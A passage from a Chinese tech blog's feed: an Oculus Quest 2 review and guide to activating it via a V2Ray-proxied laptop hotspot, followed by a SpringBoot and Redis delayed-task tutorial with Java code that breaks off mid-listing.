<content type="html"><![CDATA[<h1><span id="前言">前言</span></h1><p>最近上AMAZON买个台Oculus Quest2玩玩,前前后后折腾了整整一个星期才终于搞定激活问题!因此这在里写下记录希望后来的网友们少走弯路。</p><p>找了下网上的教程发现需要借助智能路由器,而我平时不怎么需要这个东西,就为了激活而买个路由器也不划算,因此我选择了笔记本共享热点的方式。</p><p><strong>说道Oculus quest2 我想先简单的评测下,先说说它的优点:</strong></p><ul><li><p>支持透视,找手柄时不用摘下头盔了</p></li><li><p>支持手势操作,简单的操作无需手柄了</p></li><li><p>最大的优势—–>没有乱七八糟的线!比如PSVR就要插一堆线,每次看着这么多线就没有开启的动力了</p></li><li><p>一体机,即可以直接使用又可以WIFI串连电脑玩STEAM VR游戏!</p></li><li><p>AMAZON退税后约只需1900-2000左右(不要上TB买JS的)</p></li></ul><p><strong>再说说它的不足之处:</strong></p><ul><li><p>清晰度和PSVR相差不大,至少我的眼睛感觉没有明显差距</p></li><li><p>头戴的那个带子刮耳朵</p></li><li><p>一会儿要充电了</p></li><li><p>国内用户无法直接使用</p></li></ul><p>总体来说是目前VR里体验最好的了,不用插线实在是方便</p><span id="more"></span><h1><span id="前置条件">前置条件</span></h1><p>需要准备以下东西:</p><ul><li><p>支持共享热点的笔记本一台</p></li><li><p>V2RAY以及支持UDP转发的节点(如果不知道V2RAY是什么请先学习相关内容)</p></li><li><p>SSTAP(一个本地代理转发的软件)</p></li><li><p>(可选)支持5G信号的路由器,因为2.4G的WIFI串流会卡</p></li></ul><h1><span id="开始配置">开始配置</span></h1><p>1、首先配置好V2节点,再打开配置界面分别勾选上“UDP转发”以及”允许局域网连接“这两个选项,然后右键右下角的V2图标将代理模式改成全局模式</p><p>2、打开windows10自带的移动热点分享,开启热点分享此时网络适配器控制面板中会多出一个名字叫本地连接12的东西,如果系统没有自带热点功能,请使用其它WIFI共享软件代替</p><p>3、打开SSTAP,点击+号选新建SOCKET5代理,代理地址填127.0.0.1,代理端口填10808(V2RAY默认代理端口就是这个,如有修改该端口可在配置里修改),代理网卡选刚才开启分享的热点(比如名字叫本地连接12),点击启动</p><p>此时网络适配器控制面板中会多出一个名字叫SSTAP1的连接,右键属性选共享,勾上刚才开启热点产生的本地连接12。</p><p><img src="" alt="avatar"></p><p>4、手机连上共享出来的WIFI,试试该IP地址是否为V2节点的地址,或直接访问FB看看</p><p>5、最后如果一切正常,此时可以用oculus quest2连接此WIFI了,不管是激活、还是更新固件都没问题。</p><h1><span id="无线串流">无线串流</span></h1><p>如何5G WIFI无线串流玩STEAM VR游戏? 有两种方式:</p><p><strong>付费方式:</strong>virual desktop + oculus sidequest ,其中virual desktop需要付费购买,virual desktop请使用sidequest安装</p><p><strong>免费方式:</strong> PC和VR端都安装ALVR,由于最近GITHUB被墙不方便直接给地址了,可以自行上GITHUB搜索 ALVR ,PC和VR安装好ALVR以及STEAM VR后就可以开始无线串流了。</p><p><strong>一些注意点:</strong></p><ul><li><p>如果ALVR无法检测到VR,可以先安装Oculus Home,也就是PC端的Oculus商店</p></li><li><p>ALVR连接成功后你会发现VR界面中的STEAM库是没有游戏的,不用管直接STEAM添加本地游戏然后启动即可</p></li><li><p>记得两台设备都要连接5G WIFI</p></li></ul>]]></content>
<summary type="html"><h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>最近上AMAZON买个台Oculus Quest2玩玩,前前后后折腾了整整一个星期才终于搞定激活问题!因此这在里写下记录希望后来的网友们少走弯路。</p>
<p>找了下网上的教程发现需要借助智能路由器,而我平时不怎么需要这个东西,就为了激活而买个路由器也不划算,因此我选择了笔记本共享热点的方式。</p>
<p><strong>说道Oculus quest2 我想先简单的评测下,先说说它的优点:</strong></p>
<ul>
<li><p>支持透视,找手柄时不用摘下头盔了</p>
</li>
<li><p>支持手势操作,简单的操作无需手柄了</p>
</li>
<li><p>最大的优势—–&gt;没有乱七八糟的线!比如PSVR就要插一堆线,每次看着这么多线就没有开启的动力了</p>
</li>
<li><p>一体机,即可以直接使用又可以WIFI串连电脑玩STEAM VR游戏!</p>
</li>
<li><p>AMAZON退税后约只需1900-2000左右(不要上TB买JS的)</p>
</li>
</ul>
<p><strong>再说说它的不足之处:</strong></p>
<ul>
<li><p>清晰度和PSVR相差不大,至少我的眼睛感觉没有明显差距</p>
</li>
<li><p>头戴的那个带子刮耳朵</p>
</li>
<li><p>一会儿要充电了</p>
</li>
<li><p>国内用户无法直接使用</p>
</li>
</ul>
<p>总体来说是目前VR里体验最好的了,不用插线实在是方便</p></summary>
<category term="其它" scheme="https://reiner.host/categories/%E5%85%B6%E5%AE%83/"/>
<category term="oculus" scheme="https://reiner.host/tags/oculus/"/>
<category term="oculusquest2" scheme="https://reiner.host/tags/oculusquest2/"/>
</entry>
<entry>
<title>SpringBoot中使用redis实现相对可靠的分布式定时任务,适用于订单场景</title>
<link href="https://reiner.host/posts/569a11d6.html"/>
<id>https://reiner.host/posts/569a11d6.html</id>
<published>2021-03-18T02:59:58.000Z</published>
<updated>2021-12-24T12:18:32.974Z</updated>
<content type="html"><![CDATA[<h1><span id="重要的前言">重要的前言</span></h1><p> 先说说为什么重复造轮子,当时的情况是只需要一个简单的延时任务,做到不丢失即可,引入分布式定时任务框架又觉得太重,因此手动造了个基于redis的简单可靠定时任务。</p><p>适用场景,此种做法在单机部署情况下是肯定没问题的,在分布式部署情况下可能会出现问题,比如同一个服务同时重启了,又刚好同时读取redis中的定时任务,还刚好就在那几十毫秒的情况下没有检测到redis锁,此时会导致任务重复读取。</p><p>因此,在定时任务的代码中需要容忍可能会出现重复执行的情况,一般做法是用订单状态判断,所以如果不是非常严格的场景,这套做法是够用了 (复杂的定时任务建议用QUARTZ)。</p><h1><span id="上代码">上代码</span></h1><p> 废话结束,接下来上代码,首先创建定时任务的实体类,保存定时任务执行时间、订单ID、订单类型等。</p><h4><span id="定时任务实体类">定时任务实体类</span></h4><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">DelayedInfo</span> <span class="keyword">implements</span> <span class="title">Delayed</span> </span>{</span><br><span class="line"> <span class="keyword">private</span> String orderId;</span><br><span class="line"> <span class="comment">/**</span></span><br><span class="line"><span class="comment"> * 任务类型(订单类型)</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"> <span class="keyword">private</span> Integer delayType;</span><br><span class="line"> <span class="comment">/**</span></span><br><span class="line"><span class="comment"> * 当前时间</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"> <span class="keyword">private</span> <span class="keyword">long</span> currentTime;</span><br><span class="line"> <span class="comment">/**</span></span><br><span class="line"><span class="comment"> * 任务执行时间=当前时间 + 延时任务执行时间</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"> <span class="keyword">private</span> <span class="keyword">long</span> startTime;</span><br><span class="line"> <span class="comment">/**</span></span><br><span class="line"><span class="comment"> * 延时时间,单位为秒</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"> <span class="keyword">private</span> <span class="keyword">long</span> timeOut;</span><br><span class="line"> <span class="function"><span class="keyword">public</span> <span class="title">DelayedInfo</span><span class="params">()</span></span>{}</span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">public</span> <span class="title">DelayedInfo</span><span class="params">(String orderId, <span class="keyword">long</span> currentTime, <span class="keyword">long</span> timeOut)</span> </span>{</span><br><span class="line"> <span class="keyword">this</span>.orderId = orderId;</span><br><span class="line"> <span class="keyword">this</span>.currentTime = currentTime;</span><br><span class="line"> <span class="keyword">this</span>.startTime = currentTime + timeOut * <span class="number">1000l</span>;</span><br><span class="line"> <span class="keyword">this</span>.timeOut=timeOut;</span><br><span class="line"> <span class="keyword">this</span>.delayType=Contract.ORDER_TYPE_CHARGE;</span><br><span class="line"> }</span><br><span class="line"> </span><br><span class="line"> <span class="function"><span class="keyword">public</span> <span class="title">DelayedInfo</span><span class="params">(String orderId, <span class="keyword">long</span> currentTime, <span class="keyword">long</span> timeOut,<span class="keyword">int</span> orderType)</span> </span>{</span><br><span class="line"> <span class="keyword">this</span>.orderId = orderId;</span><br><span class="line"> <span class="keyword">this</span>.currentTime = currentTime;</span><br><span class="line"> <span class="keyword">this</span>.startTime = currentTime + timeOut * <span class="number">1000l</span>;</span><br><span class="line"> <span class="keyword">this</span>.timeOut=timeOut;</span><br><span class="line"> <span class="keyword">this</span>.delayType=orderType;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="meta">@Override</span></span><br><span class="line"> <span class="function"><span class="keyword">public</span> <span class="keyword">long</span> <span class="title">getDelay</span><span class="params">(TimeUnit unit)</span> </span>{</span><br><span class="line"> <span class="keyword">return</span> unit.convert(startTime - System.currentTimeMillis(), unit);</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="meta">@Override</span></span><br><span class="line"> <span class="function"><span class="keyword">public</span> <span class="keyword">int</span> <span class="title">compareTo</span><span class="params">(Delayed other)</span> </span>{</span><br><span class="line"> <span class="keyword">if</span> (other == <span class="keyword">this</span>){</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">if</span>(other <span class="keyword">instanceof</span> DelayedInfo){</span><br><span class="line"> DelayedInfo otherRequest = (DelayedInfo)other;</span><br><span class="line"> <span class="keyword">long</span> otherStartTime = otherRequest.getStartTime();</span><br><span class="line"> <span class="keyword">return</span> (<span class="keyword">int</span>)(<span class="keyword">this</span>.startTime - otherStartTime);</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">public</span> String <span class="title">getOrderId</span><span class="params">()</span> </span>{</span><br><span class="line"> <span class="keyword">return</span> orderId;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">public</span> <span class="keyword">void</span> <span class="title">setOrderId</span><span class="params">(String orderId)</span> </span>{</span><br><span class="line"> <span class="keyword">this</span>.orderId = orderId;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">public</span> <span class="keyword">long</span> <span class="title">getStartTime</span><span class="params">()</span> </span>{</span><br><span class="line"> <span class="keyword">return</span> startTime;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">public</span> <span class="keyword">void</span> <span class="title">setStartTime</span><span class="params">(<span class="keyword">long</span> startTime)</span> </span>{</span><br><span class="line"> <span class="keyword">this</span>.startTime = startTime;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">public</span> <span class="keyword">long</span> <span class="title">getCurrentTime</span><span class="params">()</span> </span>{</span><br><span class="line"> <span class="keyword">return</span> currentTime;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">public</span> <span class="keyword">void</span> <span class="title">setCurrentTime</span><span class="params">(<span class="keyword">long</span> currentTime)</span> </span>{</span><br><span class="line"> <span class="keyword">this</span>.currentTime = currentTime;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="meta">@Override</span></span><br><span class="line"> <span class="function"><span class="keyword">public</span> String <span class="title">toString</span><span class="params">()</span> </span>{</span><br><span class="line"> <span class="keyword">return</span> JacksonUtil.toJSon(<span class="keyword">this</span>);</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">public</span> <span class="keyword">long</span> <span class="title">getTimeOut</span><span class="params">()</span> </span>{</span><br><span class="line"><span class="keyword">return</span> timeOut;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">public</span> <span class="keyword">void</span> <span class="title">setTimeOut</span><span class="params">(<span class="keyword">long</span> timeOut)</span> </span>{</span><br><span class="line"><span class="keyword">this</span>.timeOut = timeOut;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">public</span> Integer <span class="title">getDelayType</span><span class="params">()</span> </span>{</span><br><span class="line"><span class="keyword">return</span> delayType;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">public</span> <span class="keyword">void</span> <span class="title">setDelayType</span><span class="params">(Integer delayType)</span> </span>{</span><br><span class="line"><span class="keyword">this</span>.delayType = delayType;</span><br><span class="line">}</span><br><span class="line"> </span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>其中delayType、OrderType就是订单类型的枚举标识,可自己定义标识。</p><span id="more"></span><h4><span id="定时任务父类">定时任务父类</span></h4><p>再创建一个定时任务的抽象类,它用来做一些每个定时任务都会有的操作,比如添加定时任务,删除定时任务,扫描redis:</p><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">abstract</span> <span class="class"><span class="keyword">class</span> <span class="title">DelayService</span> </span>{</span><br><span class="line"><span class="keyword">private</span> DelayQueue<DelayedInfo> delayQueue = <span class="keyword">new</span> DelayQueue<DelayedInfo>();</span><br><span class="line"><span class="keyword">protected</span> Logger logger = LoggerFactory.getLogger(<span class="keyword">this</span>.getClass());</span><br><span class="line">StringRedisTemplate redisTemplate;</span><br><span class="line"><span class="function"><span class="keyword">public</span> <span class="title">DelayService</span><span class="params">(StringRedisTemplate redisTemplate)</span> </span>{</span><br><span class="line"><span class="keyword">this</span>.redisTemplate = redisTemplate;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@Title</span>: delayProcess</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@Description</span>: 延时任务的具体实现</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@author</span> reinershir</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@date</span> 2020年12月11日</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@param</span> info 定时任务的参数</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@return</span> 如返回true,表示任务执行完成,将会从redis中删除定时任务,返回false会重新等待一轮时间再次执行</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="function"><span class="keyword">public</span> <span class="keyword">abstract</span> <span class="keyword">boolean</span> <span class="title">delayProcess</span><span class="params">(DelayedInfo info)</span></span>;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">public</span> <span class="keyword">boolean</span> <span class="title">remove</span><span class="params">(DelayedInfo order)</span> </span>{</span><br><span class="line">redisTemplate.delete(getRedisKey(order));</span><br><span class="line"><span class="keyword">return</span> delayQueue.remove(order);</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@Title</span>: getRedisKey</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@Description</span>: 拼接redis存储的key</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@author</span> reinershir</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@date</span> 2020年12月14日</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@param</span> info</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@return</span></span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="function"><span class="keyword">private</span> String <span class="title">getRedisKey</span><span class="params">(DelayedInfo info)</span> </span>{</span><br><span class="line"><span class="keyword">return</span> Contract.DELAYED_TASK_KEY + info.getDelayType() + <span class="string">"_"</span> + info.getOrderId();</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@Title</span>: getRedisKeyPrefix</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@Description</span>: 获取redis key前缀,用于扫描</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@author</span> reinershir</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@date</span> 2020年12月14日</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@param</span> orderType 订单类型枚举</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@return</span> redis key prefix</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="function"><span class="keyword">private</span> String <span class="title">getRedisKeyPrefix</span><span class="params">(OrderType orderType)</span> </span>{</span><br><span class="line"><span class="keyword">return</span> Contract.DELAYED_TASK_KEY + orderType.getType();</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">public</span> DelayedInfo <span class="title">take</span><span class="params">()</span> <span class="keyword">throws</span> InterruptedException </span>{</span><br><span class="line"><span class="keyword">return</span> <span class="keyword">this</span>.delayQueue.take();</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@Title</span>: add</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@Description</span>:</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@author</span> reinershir</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@date</span> 2020年12月11日</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@param</span> orderId 订单号</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@param</span> currentTime 当前时间,直接用System.currentTimeMillis</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@param</span> timeout 延时执行时间,单位为秒</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="function"><span class="keyword">public</span> <span class="keyword">void</span> <span class="title">add</span><span class="params">(String orderId, <span class="keyword">long</span> currentTime, <span class="keyword">long</span> timeout)</span> </span>{</span><br><span class="line">DelayedInfo info = <span class="keyword">new</span> DelayedInfo(orderId, currentTime, timeout);</span><br><span class="line">delayQueue.put(info);</span><br><span class="line">redisTemplate.opsForValue().set(getRedisKey(info), com.hz.dianlailai.utils.JacksonUtil.toJSon(info));</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">public</span> <span class="keyword">void</span> <span class="title">add</span><span class="params">(DelayedInfo info)</span> </span>{</span><br><span class="line">delayQueue.put(info);</span><br><span class="line">redisTemplate.opsForValue().set(getRedisKey(info), com.hz.dianlailai.utils.JacksonUtil.toJSon(info));</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">public</span> <span class="keyword">void</span> <span class="title">addDelayTask</span><span class="params">(String orderId, Integer delayType, <span class="keyword">long</span> timeout)</span> </span>{</span><br><span class="line">DelayedInfo info = <span class="keyword">new</span> DelayedInfo(orderId, System.currentTimeMillis(), timeout);</span><br><span class="line">info.setDelayType(delayType);</span><br><span class="line"><span class="keyword">this</span>.add(info);</span><br><span class="line">}</span><br><span class="line"> </span><br><span class="line"> <span class="function"><span class="keyword">public</span> <span class="keyword">void</span> <span class="title">putTask</span><span class="params">(DelayedInfo info)</span> </span>{</span><br><span class="line">delayQueue.put(info);</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">public</span> <span class="keyword">void</span> <span class="title">remove</span><span class="params">(String orderId)</span> </span>{</span><br><span class="line">delayQueue.forEach((info)->{</span><br><span class="line"><span class="keyword">if</span> (info.getOrderId().equals(orderId)) {</span><br><span class="line">remove(info);</span><br><span class="line"><span class="keyword">return</span>;</span><br><span class="line">}</span><br><span class="line">});</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="comment">// 扫描redis</span></span><br><span class="line"><span class="function"><span class="keyword">public</span> <span class="keyword">void</span> <span class="title">redisScan</span><span class="params">(OrderType orderType)</span> </span>{</span><br><span class="line"><span class="keyword">final</span> String prefix = getRedisKeyPrefix(orderType) + <span class="string">"*"</span>;</span><br><span class="line"><span class="keyword">new</span> Thread(<span class="keyword">new</span> Runnable() {</span><br><span class="line"><span class="meta">@Override</span></span><br><span class="line"><span class="function"><span class="keyword">public</span> <span class="keyword">void</span> <span class="title">run</span><span class="params">()</span> </span>{</span><br><span class="line">logger.info(<span class="string">"开始扫描定时任务,类型:{}"</span>, orderType);</span><br><span class="line">Set<String> keys = redisTemplate.keys(prefix + <span class="string">"*"</span>);</span><br><span class="line"><span class="keyword">if</span> (!CollectionUtils.isEmpty(keys)) {</span><br><span class="line"><span class="comment">// 写到DelayQueue</span></span><br><span class="line"><span class="keyword">for</span> (String key : keys) {</span><br><span class="line">String val = redisTemplate.opsForValue().get(key);</span><br><span class="line"><span class="comment">//不可使用订阅发布模式,因为KEY失效时服务器挂了定时任务就会丢失</span></span><br><span class="line">DelayedInfo info = JacksonUtil.readValue(val, DelayedInfo.class);</span><br><span class="line"><span class="keyword">if</span> (info != <span class="keyword">null</span>) {</span><br><span class="line"><span class="comment">//获取任务的启动时间</span></span><br><span class="line"><span class="keyword">long</span> startTime = info.getDelay(TimeUnit.MILLISECONDS);</span><br><span class="line"><span class="keyword">if</span>(startTime<<span class="number">1</span>) {</span><br><span class="line"><span class="comment">//如果执行时间已经过期(即应该要马上执行的任务),加个5秒的锁,保证在执行时没有其它程序读取即可,(所以此定时非完全可靠,需要定时任务中的代码支持重复执行的情况)</span></span><br><span class="line">startTime = <span class="number">5000l</span>;</span><br><span class="line">}</span><br><span class="line"><span class="comment">//给该任务设置一个状态,表示已经有程序在读取该定时任务了</span></span><br><span class="line"><span class="keyword">if</span>(redisTemplate.opsForValue().setIfAbsent(<span class="string">"TASK_LOCK_"</span>+key, info.getOrderId(), startTime, TimeUnit.MILLISECONDS)) {</span><br><span class="line">logger.info(<span class="string">"找到定时任务,任务类型:{},编号:{},时间:{}分钟"</span>, orderType, info.getOrderId(),info.getDelay(TimeUnit.MILLISECONDS)/<span class="number">1000</span>/<span class="number">60</span>);</span><br><span class="line">DelayService.<span class="keyword">this</span>.putTask(info);</span><br><span class="line"><span class="comment">//清除占用状态</span></span><br><span class="line">redisTemplate.delete(<span class="string">"TASK_LOCK_"</span>+key);</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">}<span class="keyword">else</span> {</span><br><span class="line">redisTemplate.delete(key);</span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line">logger.info(<span class="string">"类型:{} 定时任务扫描完毕!"</span>, orderType);</span><br><span class="line">}</span><br><span class="line">}).start();</span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line"></span><br></pre></td></tr></table></figure><h4><span id="订单定时任务处理类">订单定时任务处理类</span></h4><p>OK,上面已经建好了父类,接下来可以创建执行业务代码的订单延时任务了,此处我还加了个小功能,那就是执行结果返回true才真的结束任务,如果返回false会再等待一次相同的时间再执行,最多允许失败3次。</p><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">@Service</span></span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">OrderDelayService</span> <span class="keyword">extends</span> <span class="title">DelayService</span></span>{</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">public</span> <span class="title">OrderDelayService</span><span class="params">(StringRedisTemplate redisTemplate)</span> </span>{</span><br><span class="line"><span class="keyword">super</span>(redisTemplate);</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="meta">@Override</span></span><br><span class="line"><span class="function"><span class="keyword">public</span> <span class="keyword">boolean</span> <span class="title">delayProcess</span><span class="params">(DelayedInfo info)</span> </span>{</span><br><span class="line">logger.info(<span class="string">"执行检查订单定时任务,订单编号:{}"</span>,info.getOrderId());</span><br><span class="line">ConsummerOrder order = orderService.getByOrderNo(info.getOrderId());</span><br><span class="line"><span class="keyword">if</span>(order!=<span class="keyword">null</span>) {</span><br><span class="line"><span class="keyword">return</span> <span class="keyword">false</span>;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="keyword">return</span> <span class="keyword">true</span>;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">}</span><br><span class="line"></span><br></pre></td></tr></table></figure><h4><span id="创建定时任务执行类">创建定时任务执行类</span></h4><p>定时任务创建好后需要有个东西来执行它,因此我创建一个循环执行的线程不断判断是否有任务,如果没有任务,该线程阻塞。</p><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span 